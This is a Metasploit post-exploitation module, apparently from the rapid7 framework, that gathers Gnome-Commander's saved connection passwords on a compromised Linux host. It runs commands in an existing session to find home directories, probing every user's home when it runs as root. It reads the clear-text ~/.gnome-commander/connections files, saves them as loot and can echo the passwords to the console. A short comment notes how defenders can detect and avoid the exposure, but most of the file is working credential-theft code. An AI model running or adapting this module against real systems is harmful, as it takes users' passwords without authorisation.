Path: blob/master/modules/post/linux/gather/gnome_commander_creds.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that copies Gnome-Commander's saved-connections file from an
# existing Linux session into the framework's loot store.
#
# Defender's view: per the module description, Gnome-Commander keeps
# connection passwords in clear text in ~/.gnome-commander/connections, so
# anyone able to read that file obtains them. Reads of that path by a process
# other than Gnome-Commander itself are a reasonable thing to alert on, and
# not saving passwords in connection entries removes the exposure.
class MetasploitModule < Msf::Post
  include Msf::Post::File

  # Registers the module metadata (name, description, platform, session types).
  #
  # @param info [Hash] caller-supplied metadata merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather Gnome-Commander Creds',
        'Description' => %q{
          This module collects the clear text passwords stored by
          Gnome-commander, a GUI file explorer for GNOME. Typically, these
          passwords are stored in the user's home directory, at
          ~/.gnome-commander/connections.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
        'Platform' => %w[linux],
        'SessionTypes' => [ 'meterpreter', 'shell'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Looks for .gnome-commander/connections under each candidate home
  # directory and stores every file found as loot.
  #
  # Scope: as root, /root plus every entry listed under /home is probed;
  # otherwise only /home/<current user>. Home directories located anywhere
  # else are not looked at.
  def run
    current_user = cmd_exec('whoami').chomp

    home_dirs =
      if current_user == 'root'
        print_status("Current user is #{current_user}, probing all home dirs")
        # One candidate per line of `ls /home`; chomp drops the trailing newline.
        ['/root'] + cmd_exec('ls /home').each_line.map { |entry| "/home/#{entry}".chomp }
      else
        print_status("Current user is #{current_user}, probing /home/#{current_user}")
        ["/home/#{current_user}"]
      end

    home_dirs.each do |home|
      connections_file = "#{home}/.gnome-commander/connections"

      # Nothing to collect for this home; only reported in verbose mode.
      unless file?(connections_file)
        vprint_error("File not found: #{connections_file}")
        next
      end

      begin
        contents = read_file(connections_file)
        print_good("File found: #{connections_file}")
        # Verbose mode echoes the file, clear-text passwords included, to the console.
        vprint_line(contents)
        loot_path = store_loot('connections', 'text/plain', session, contents, connections_file, 'Gnome-Commander connections')
        print_good("Connections file saved to #{loot_path}")
      rescue EOFError
        # An empty connections file surfaces as EOFError on read.
        print_error("Nothing read from file: #{connections_file}, file may be empty")
      end
    end
  end
end